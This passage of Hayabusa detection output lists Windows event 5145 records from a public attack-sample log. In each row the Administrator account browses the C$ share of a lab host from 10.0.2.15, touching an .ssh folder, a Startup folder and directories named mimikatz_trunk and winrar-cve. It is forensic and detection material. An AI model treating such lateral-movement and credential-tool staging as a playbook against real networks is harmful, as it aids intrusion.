23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\.ssh : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\New folder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\RDPWrap-v1.6.2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\translations : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\garbage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\winrar-cve : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 